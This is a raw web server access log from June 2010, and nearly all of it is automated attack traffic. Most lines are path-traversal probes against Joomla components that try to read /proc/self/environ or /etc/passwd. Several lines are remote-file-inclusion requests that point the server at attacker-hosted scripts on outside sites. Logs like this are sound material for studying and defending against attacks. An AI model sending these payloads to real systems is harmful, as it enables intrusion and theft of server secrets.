118.129.166.213 - - [09/Jun/2010:21:13:21 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:21:14:21 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
67.195.112.180 - - [09/Jun/2010:21:17:16 -0500] "GET /?D=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.129.166.213 - - [09/Jun/2010:21:19:40 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
210.109.108.186 - - [09/Jun/2010:21:22:39 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.109.108.186 - - [09/Jun/2010:21:22:40 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
218.150.85.170 - - [09/Jun/2010:21:23:57 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.825"
75.125.143.154 - - [09/Jun/2010:21:24:50 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.143.154 - - [09/Jun/2010:21:24:50 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.143.154 - - [09/Jun/2010:21:24:50 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.143.154 - - [09/Jun/2010:21:24:50 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.143.154 - - [09/Jun/2010:21:24:54 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
218.150.85.170 - - [09/Jun/2010:21:25:57 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.825"
91.121.25.25 - - [09/Jun/2010:21:26:25 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.25.25 - - [09/Jun/2010:21:26:25 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
210.109.108.186 - - [09/Jun/2010:21:26:36 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.109.108.186 - - [09/Jun/2010:21:26:37 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.109.108.186 - - [09/Jun/2010:21:26:38 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.109.108.186 - - [09/Jun/2010:21:26:38 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.109.108.186 - - [09/Jun/2010:21:26:39 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.109.108.186 - - [09/Jun/2010:21:26:39 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
89.111.176.22 - - [09/Jun/2010:21:30:14 -0500] "GET /logs/access_log.1274572800//*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
89.111.176.22 - - [09/Jun/2010:21:30:15 -0500] "GET //*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
89.111.176.22 - - [09/Jun/2010:21:30:15 -0500] "GET /logs//*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
89.111.176.22 - - [09/Jun/2010:21:30:26 -0500] "GET /logs//*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
89.111.176.22 - - [09/Jun/2010:21:30:26 -0500] "GET //*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
121.190.102.21 - - [09/Jun/2010:21:30:44 -0500] "GET /logs//register.php/lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.190.102.21 - - [09/Jun/2010:21:30:44 -0500] "GET /logs/access_log.1271548800//register.php/lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [09/Jun/2010:21:30:44 -0500] "GET //register.php/lostpasswd.php?env[include_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.111.176.22 - - [09/Jun/2010:21:30:55 -0500] "GET //*.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
118.129.166.213 - - [09/Jun/2010:21:32:09 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
61.67.240.189 - - [09/Jun/2010:21:32:53 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 287 "-""Mozilla/5.0"
61.67.240.189 - - [09/Jun/2010:21:32:53 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 282 "-""Mozilla/5.0"
83.125.73.49 - - [09/Jun/2010:21:33:01 -0500] "GET /logs/access_log.1273017600//yabbse//yabbse/Sources/Packages.php?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""libwww-perl/5.805"
83.125.73.49 - - [09/Jun/2010:21:33:01 -0500] "GET //yabbse//yabbse/Sources/Packages.php?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.125.73.49 - - [09/Jun/2010:21:33:01 -0500] "GET /logs//yabbse//yabbse/Sources/Packages.php?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
118.129.166.213 - - [09/Jun/2010:21:33:18 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
207.46.204.181 - - [09/Jun/2010:21:33:39 -0500] "GET /logs/access_log.1176854400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.65.134 - - [09/Jun/2010:21:34:27 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:21:34:59 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
118.129.166.213 - - [09/Jun/2010:21:35:15 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
67.195.112.180 - - [09/Jun/2010:21:36:20 -0500] "GET /?N=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.129.166.213 - - [09/Jun/2010:21:37:26 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:21:37:48 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:21:39:18 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:21:45:03 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
207.46.13.50 - - [09/Jun/2010:21:48:39 -0500] "GET /logs/access_log.1165795200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [09/Jun/2010:21:50:01 -0500] "GET /logs/access_log.1218240000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.34.19 - - [09/Jun/2010:21:50:33 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.55.65.134 - - [09/Jun/2010:21:50:39 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:21:50:39 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:21:50:40 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
61.67.240.189 - - [09/Jun/2010:21:51:42 -0500] "GET /logs/access_log.1274227200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 309 "-""Mozilla/5.0"
61.67.240.189 - - [09/Jun/2010:21:51:43 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 282 "-""Mozilla/5.0"
218.38.34.19 - - [09/Jun/2010:21:52:37 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
218.38.34.19 - - [09/Jun/2010:21:53:58 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.38.34.19 - - [09/Jun/2010:21:53:59 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
218.38.34.19 - - [09/Jun/2010:21:53:59 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
62.210.190.230 - - [09/Jun/2010:21:56:19 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.210.190.230 - - [09/Jun/2010:21:56:19 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
178.18.116.70 - - [09/Jun/2010:21:56:53 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
178.18.116.70 - - [09/Jun/2010:21:56:53 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
189.126.195.70 - - [09/Jun/2010:21:59:03 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:21:59:03 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:21:59:03 -0500] "GET /phphtml.php?htmlclass_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
74.55.65.134 - - [09/Jun/2010:22:00:27 -0500] "GET /logs/access_log.1273017600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:22:00:27 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:22:00:27 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
218.38.34.19 - - [09/Jun/2010:22:01:36 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
218.38.34.19 - - [09/Jun/2010:22:01:37 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
218.38.34.19 - - [09/Jun/2010:22:01:37 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
189.126.195.70 - - [09/Jun/2010:22:02:02 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:22:02:02 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
189.126.195.70 - - [09/Jun/2010:22:02:02 -0500] "GET /phphtml.php?htmlclass_path=http://www.tourgaja.net/www/data/sc1?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
72.32.58.140 - - [09/Jun/2010:22:02:23 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:02:23 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.108.254.21 - - [09/Jun/2010:22:02:24 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:02:24 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.32.58.140 - - [09/Jun/2010:22:02:25 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:02:25 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.108.254.21 - - [09/Jun/2010:22:02:27 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:02:27 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.204.196 - - [09/Jun/2010:22:03:09 -0500] "GET /logs/access_log.1253750400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.32.58.140 - - [09/Jun/2010:22:03:22 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:03:22 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.55.65.134 - - [09/Jun/2010:22:03:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.108.254.21 - - [09/Jun/2010:22:03:34 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:03:38 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.32.58.140 - - [09/Jun/2010:22:04:05 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:05 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:05 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:06 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:06 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:06 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:09 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:09 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:09 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:14 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:16 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:17 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:17 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:17 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.32.58.140 - - [09/Jun/2010:22:04:35 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.108.254.21 - - [09/Jun/2010:22:04:40 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:40 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:41 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:42 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:42 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:42 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.32.58.140 - - [09/Jun/2010:22:04:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
218.38.243.71 - - [09/Jun/2010:22:04:50 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:53 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:54 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.38.243.71 - - [09/Jun/2010:22:04:58 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.108.254.21 - - [09/Jun/2010:22:04:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
